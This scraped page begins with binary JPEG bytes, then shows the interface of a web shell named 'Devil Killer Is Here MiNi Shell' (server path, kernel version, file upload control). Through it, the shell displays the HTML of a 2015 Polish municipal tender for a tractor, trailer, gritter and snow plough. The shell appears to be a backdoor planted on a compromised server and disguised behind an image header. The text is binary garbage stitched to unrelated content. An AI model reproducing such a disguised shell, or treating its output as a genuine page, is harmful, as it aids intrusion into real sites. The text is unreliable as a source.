JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151127/322402-N-2015.html

<p class="kh_header"><b>Dąbie: Zakup i dostawa nowego ciągnika rolnego z przyczepą wraz z osprzętem 
(pług do odśnieżania; piaskarka ciągnikowa; przyczepa)</b><br>
<b>Numer ogłoszenia: 322402 - 2015; data zamieszczenia: 27.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej w Psarach , ul. Dolna 1, 42-504 Dąbie, woj. śląskie, tel. 032 3601671, faks 032 3601670.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa nowego ciągnika rolnego z przyczepą wraz z osprzętem 
(pług do odśnieżania; piaskarka ciągnikowa; przyczepa).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup z dostawą nowego ciągnika rolnego 
z przyczepą wraz z osprzętem pług do odśnieżania; piaskarka ciągnikowa; przyczepa,spełniający warunki dopuszczenia do ruchu drogowego o niżej określonych parametrach technicznych i wyposażeniu:
I.	CIĄGNIK ROLNY:
- ciągnik fabrycznie nowy, rok produkcji 2015;
- gwarancja producenta przez okres minimum 12 miesięcy
1)	Silnik:
Moc silnika				74 KM-54,4 kW
	Mon na WOM	         	         		         
	Obroty nominalne			2,200 obr min
	Ilość cylindrów				      4
	Pojemność 				2900 ccm
	Filtr powietrza				podwójny, suchy
2)	Instalacja elektryczna:
	Alternator				12V, 95A
3)	Układ paliwowy;
	Rodzaj					Common Rail
4)	Układ napędowy:
	Przekładnia				mechaniczna, synchronizowana, z rewersem 
Mechanicznym
	Ilość biegów				16 16
	Prędkość maksymalna		             35 km h
	Hamulce				mechaniczne
	Układ kierowniczy			ze wspomaganiem
	Sprzęgło				jednotarczowe, suche
5)	Układ hydrauliczny
	Pompa					podwójna pompa zębata
	Wydajność pompy głównej		40 l/min
	Wydajność pompy wspomaga.		18 l min	
	Maksymalna wydajność układu		58 l min
	Kategoria podnośnika			Kat. II, zaczepy hakowe
	Udźwig podnośnika			2500 kg
	Udźwig podnośnika 60 cm za 
hakami					1600 kg
	Regulacja podnośnika			mechaniczna, pozycyjna/siłowa
	Układ sterujący ładowaczem
(joystick i rozdzielacz)			standard
	Liczba zaworów sterujących		2 pary z tyłu  2 pary z przodu
6)	Wom:
	Rodzaj					niezależny
	Sterowanie				elektrohydrauliczne
	Obroty środko. WOM (opcja)		nie dotyczy
	Obroty tylnego WOM			540 750 obr min
	Średnica końcówki WOM		1 3 8 cala   35 min
7)	Pojemności:
	Zbiornik paliwa				90 l
	System chłodzenia			-
	Olej silnikowy (z filtrem)			-
	Instalacja hydrauliczna			-
	Przedni most				-
8)	Wymiary (na ogumieniu standardowym):
	Długość całkowita			3870 mm
	Szerokość całkowita			1937 mm
	Rozstaw osi				2198 mm
	Wysokość całkowita			2638 mm
	Minimalny prześwit			426 mm
	Promień skrętu (z hamulcem)		3700 mm
	Promień skrętu (bez hamulca)		4120 mm
9)	Ogumienie standardowe:
	Przednie				11.2 R24
	Tylnie					16.9 R30
10)	Kabina:
	Wyposażenie				radio CD MP3, klimatyzacja, ogrzewanie,
Regulowany pneumatycznie fotel kierowcy, dodatkowe siedzenie dla pasażera z pasami bezpieczeństwa, wycieraczka tylnej 
i przedniej szyby, elektryczny odłącznik prądu
11)	Masa:
	Masa całkowita				3200 kg
II.  PRZYCZEPA ROLNICZA:
 - przyczepa fabrycznie nowa, rok produkcji 2015;
- gwarancja producenta przez okres minimum 12 miesięcy

Dane techniczne:
Technicznie (konstrukcyjnie)dopuszczalna masa całkowita	 9500 kg
	Dopuszczalna masa całkowita:		8900 kg
	Ładowność:				6000 kg
	Masa własna:				2900 kg
	Pojemność ładunkowa:			 	10,1 m3
	Powierzchnia ładunkowa:			10,1 m2	
	Długość skrzyni ładunkowej wewnątrz:		4190 mm	
	Szerokość skrzyni ładunkowej wewnątrz**:	2420 mm
	Wysokość ścian skrzyni:			500+500 mm
	Wymiary gabarytowe (dł. szr. wy.):		6390 2550 2200 mm
	Grubość blachy podłogi ściany:			4 2 mm
	Wysokość platformy od podłoża:		1160 mm
	Rozstaw kół:					1900 mm
	Obciążenie oka dyszy:				- kg
	Rodzaj zawieszenia: 				resory paraboliczne
	Prędkość konstrukcyjna: 14.0 65-16 14PR	40
	Rozmiar ogumienia:
(km/h) System wywrotu:			trójstronny -
	Uchwyty ładunkowe (w podłodze):		8 szt.
Cylinder teleskopowy (skok/zapotrzebowanie 1540 mm 8L 20
oleju/ciśnienie)					0bar
	Minimalne zapotrzebowanie mocy ciągnika	46,8 34,4 KM kW
	Kąt wywrotu skrzyni ładunkowej (do tyłu na boki) 50 46 st.
* dane uwzględniają kompletację przyczepy ze ścianami o wysokości w mm 500+500
** szerokość skrzyni ładunkowej wewnątrz przystosowana do transportu Europalet

Wyposażenie standardowe:
	Skrzynia ładunkowa z uniwersalnym systemem otwierania ścian;
	Płyta podłogowa z centralnym regulowanie ścian, z ośmioma uchwytami do mocowania ładunku w zagłębionych kieszeniach podłogi;
	Konstrukcja skrzyni ładunkowej przystosowana do transportu Europalet;
	Prostokątna rama podwozia z profili zamkniętych o wysokiej wytrzymałości;
	Dyszel typu V z zaczepem sztywnym z okiem 40 mm;
	Układ kierowania: obrotnica kulkowa z ramą obrotową; 
	Instalacja hamulcowa pneumatyczna dwuprzewodowa;
	Hamulec postojowy: ręczny na korbę;
	 Instalacja oświetlenia 12V z tylnym gniazdem elektrycznym;
	Przewód przyłączeniowy, spiralny, instalacji oświetleniowej;
	Tylne zaczep manualny sztywny oraz tylne wyjścia hydrauliki, hamulców do drugiej przyczepy;
	Zawór odcinający hydraulicznej wywrotu;
	Siłownik teleskopowy trójstronnego wywrotu skrzyni ładunkowej z zawiesiem przegubowym;
	Podpora serwisowa skrzyni ładunkowej;
	Ściany z wysokiej jakości, mocnych profili PF 500 mm, z obrzeżem 60 mm, wykonanych z wykorzystaniem zaawansowanej technologii profilowania blach i spawania laserowego z odkuwanymi zawiasami i zamkami;
	Przestrzenie zamknięte profili ścian i nadstaw zabezpieczone spoiną laserową;
	Błotniki kół tylnych;
	Materiały malarskie chemoutwardzalne dwuskładnikowe o wysokiej trwałości i odporności UV;
	Dwa kliny do kół umieszczone w ocynkowanych kieszeniach;
	Drabina i stopnie burtowe ułatwiające dostęp do skrzyni ładunkowej;
	Boczne listwy napinane wzmacniające ściany;
	Kolorystyka metalowa podwozia czerwony RAL 3000 PRONAR;
	Kolorystyka metalowa ścian zielony RAL 6010 PRONAR.
Przyczepa rolnicza ma współpracować z ciągnikiem.
III.  PIASKARKA CIĄGNIKOWA:
- sprzęt fabrycznie nowa, rok produkcji 2015;
- gwarancja producenta przez okres minimum 12 miesięcy

Piaskarka ciągnikowa zawieszona na tylnych TUZ jest przeznaczona do powierzchniowego wysiewu piasku. Pojemność skrzyni wynosi 1 m , szerokość robocza 2 m i maksymalna prędkość pracy agregatu 10 km h pozwalają na komfortowe użytkowanie praktycznie w każdym gospodarstwie. Dobry wybór dla firm komunalnych i wspólnot mieszkaniowych.
Ważną cechą użytkową jest możliwość załadunku piasku bezpośrednio z pryzmy. Dużą zaletą konstrukcji jest sposób wysypu piasku - nie jest rozrzucany metodą odśrodkową. Nie stanowi zagrożenia dla przechodniów, nie uszkadza parkujących przy posypywanym chodniku pojazdów. Szerokość wysypu jest równa szerokości maszyny. Zawór regulujący prędkość napędu oraz dźwignia regulująca szerokość prześwitu pozwala zmieniać intensywność wysypu.
Dane techniczne: 
    Parametry	
		
	Szerokość robocza mm od 1330  do	1830
	Szerokość transportowa mm od 1700  do	2200
	Długość mm	1200
	Wysokość mm	1350
	Objętość skrzyni	od 0,75 m3	do 1 m3
	Masa maszyny kg	od 470   do	550
	Obsługa	1 osoba
	Prędkość obrotowa wału dozującego	max 250 obr. min
	Prędkość obrotowa wału kruszącego	max 170 obr. min
	Napęd elementów roboczych	hydrauliczny
	Prędkość robocza	10 km h
	Prędkość transportowa	15 km h
Piaskarka ciągnikowa ma współpracować z ciągnikiem.
IV.  PŁUG DO ODŚNIEŻANIA:
- sprzęt fabrycznie nowa, rok produkcji 2015;
- gwarancja producenta przez okres minimum 12 miesięcy
	Szerokość robocza cm: 		max 253  min 225
	Wysokość odkładnicy cm: 		80 96
	Wymagane 2 przyłącza hydrauliczne
	Zaczep TUZ II
	Uchylne lemiesze i zrywalne połączenie śrubowe
	Kąt skrętu do 30°
	Wymiary dł. wys. cm: 		             253  103
	Masa 					400 kg
Do wyboru listwa zgarniająca stalowa lub gumowa 
	Hydrauliczne sterowanie odkładnicą
	Ramka na przedni TUZ ciągnika
	Oświetlenie obrysowe LED
	Przyłącze elektryczne 12V
	Stopka podporowa
	Odboje
Pług do odśnieżania ma współpracować z ciągnikiem.
V.  Wymagania dodatkowe:
	Ciągnik wraz z osprzętem musi być gotowy do natychmiastowej pracy;
	Ciągnik oraz osprzęt musza posiadać niezbędne dokumenty i wyposażenie dopuszczające go do ruchu drogowego (książka obsługi i karta gwarancyjna w języku polskim);
	Przeglądy gwarancyjne bezpłatne w okresie trwania gwarancji;
	Wykonawca zobowiązuje się zapewnić serwis gwarancyjny i pogwarancyjny ;
	Wykaz punktów serwisowych jak najbliżej Zamawiającego;
	Katalog części zamiennych;
	Przedmiot zamówienia zostanie odebrany w siedzibie Zamawiającego;
	Ciągnik musi posiadać pełen zbiornik paliwa oraz uzupełnione płyny eksploatacyjne;
	Odbiór przedmiotu zamówienia stwierdzony zostanie protokołem zdawczo - odbiorczym;
	Szkolenie załogi w zakresie obsługi;
	Drobne naprawy gwarancyjne Wykonawca zobowiązany będzie wykonać 
w miejscu eksploatacji zakupionego ciągnika wraz z osprzętem tj. Zakład Gospodarki komunalnej w Psarach z s Dąbie, ul. Dolna 1 42-504 Będzin. 
W przypadku naprawy wymagających transportu zakupionego sprzętu tj. ciągnika wraz z osprzętem do miejsca naprawy, koszt transportu pokrywa Wykonawca. Zamawiający nie pokrywa kosztów naprawy w okresie objętym gwarancją;
	Wykonawca zapewni Zamawiającemu odpłatnie niezbędne części zamienne do dostarczonego ciągnika wraz z osprzętem zarówno w okresie gwarancyjnym (jeżeli gwarancja tej części nie obejmuje) oraz po jej zakończeniu.
	Ważne świadectwa homologacji umożliwiające rejestrację oraz dokumentację potwierdzającą dopuszczenie do eksploatacji i użytkowania;
	Wykonawca do oferty winien dołączyć kopię świadectwa homologacji lub zaświadczenie zgodności WE, atesty, certyfikaty;
	Instrukcję obsługi ze schematem hydraulicznym i schematem instalacji elektrycznej;
	Dostawca powinien dostarczyć na koszt Dostawcy ciągnik rolniczy 
z osprzętem (tj. przyczepa rolnicza; piaskarka ciągnikowa; pług do odśnieżania) do siedziby Zamawiającego;
	Przy dostawie ciągnika należy dołączyć potwierdzenie wykonania przeglądu zerowego, co należy udokumentować w książce gwarancyjnej pojazdu, bez wnoszenia dodatkowych opłat przez Zamawiającego.
 
VI.  Dostawca powinien zapewnić:
           Gwarancje i serwis
1.	CIĄGNIK - minimum 12 miesięcy bez limitu mth km; gwarancja obejmująca całość maszyny wraz z zamontowanym wyposażeniem dodatkowym;
2.	PRZYCZEPA - minimum 12 miesięcy bez limitu mth km; gwarancja obejmująca całość maszyny wraz z zamontowanym wyposażeniem dodatkowym;
3.	OSPRZĘT DODATKOWY - ( PŁÓG; PIASKARKA) minimum 12 miesięcy bez limitu mth/km; gwarancja obejmująca całość maszyny wraz z zamontowanym wyposażeniem dodatkowym;
4.	SERWIS - Wykonawca zapewnia serwis gwarancyjny i pogwarancyjny całości oferowanego sprzętu i osprzętu dodatkowego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 16.70.00.00-2, 34.39.00.00-7, 34.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępując do udziału w postępowaniu obowiązany jest wnieść wadium w PLN stosownie do art. 45 i następne ustawy Prawo zamówień publicznych (t. j. Dz. U. z 2013 r. poz. 907) w wysokości: 5.000,00 zł ( słownie pięć tysięcy złotych 00 100).
2. Wykonawca wnoszący wadium w formie pieniężnej winien przelać je na konto bankowe Nr : 
04 8438 0001 0000 3362 2000 0010 z dopiskiem Wadium na zadanie:
Zakup i dostawa nowego ciągnika rolnego z przyczepą wraz z osprzętem (pług do odśnieżania; piaskarka ciągnikowa; przyczepa).
3. W przypadku wniesienia wadium w formach niepieniężnych, oryginał wadium należy złożyć w Zakładzie Gospodarki Komunalnej w Psarach ul. Dolna 1 (parter).
4. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu;

UWAGA Za termin wniesienia wadium w tej formie uważa się termin wpływu
                środków pieniężnych na konto Zamawiającego.

b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275, z 2008r. Nr 16 poz. 730 i 732 i Nr 227 poz. 1505 oraz 2010r. Nr 96, poz. 620).
5.Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
6. Wadium wnosi się przed upływem terminu składania ofert.
7. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a. ustawy Pzp.
8.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
9.Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt. 7 niniejszej części SIWZ , jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust3 ustawy Prawo zamówień publicznych nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której  mowa w art. 24 ust. 2 pkt 5  lub informacji  o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej (art. 46 ust. 4a i 5 ustawy Pzp).
12.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,
pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez Wykonawców dokumentów i oświadczeń potwierdzających spełnienie warunków określonych w SIWZ. Ocena warunków będzie odbywać się metodą spełnia - nie spełnia. Nie spełnienie jednego lub kilku warunków udziału w postępowaniu skutkować będzie wykluczeniem wykonawcy z postępowania.
Wykonawca może polegać na wiedzy i doświadczeniu , potencjalne technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okresie korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez Wykonawców dokumentów i oświadczeń potwierdzających spełnienie warunków określonych w SIWZ. Ocena warunków będzie odbywać się metodą spełnia - nie spełnia. Nie spełnienie jednego lub kilku warunków udziału w postępowaniu skutkować będzie wykluczeniem wykonawcy z postępowania.
Wykonawca może polegać na wiedzy i doświadczeniu , potencjalne technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okresie korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez Wykonawców dokumentów i oświadczeń potwierdzających spełnienie warunków określonych w SIWZ. Ocena warunków będzie odbywać się metodą spełnia - nie spełnia. Nie spełnienie jednego lub kilku warunków udziału w postępowaniu skutkować będzie wykluczeniem wykonawcy z postępowania.
Wykonawca może polegać na wiedzy i doświadczeniu , potencjalne technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okresie korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona na podstawie złożonych przez Wykonawców dokumentów i oświadczeń potwierdzających spełnienie warunków określonych w SIWZ. Ocena warunków będzie odbywać się metodą spełnia - nie spełnia. Nie spełnienie jednego lub kilku warunków udziału w postępowaniu skutkować będzie wykluczeniem wykonawcy z postępowania.
Wykonawca może polegać na wiedzy i doświadczeniu , potencjalne technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, 
w szczególności przedstawiając w tym celu pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okresie korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

